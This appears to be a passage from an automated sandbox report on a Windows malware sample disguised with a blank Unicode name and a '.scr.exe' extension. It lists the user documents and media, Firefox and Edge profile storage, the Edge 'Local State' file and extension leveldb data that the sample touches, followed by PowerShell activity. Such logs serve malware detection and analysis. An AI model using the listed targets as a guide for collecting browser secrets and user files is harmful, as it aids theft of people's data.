              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \System\System Info.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\TQDFJHPUIU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\TQDFJHPUIU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\TQDFJHPUIU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\ZGGKNSUKOP.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\DUUDTUBZFW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeQueries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
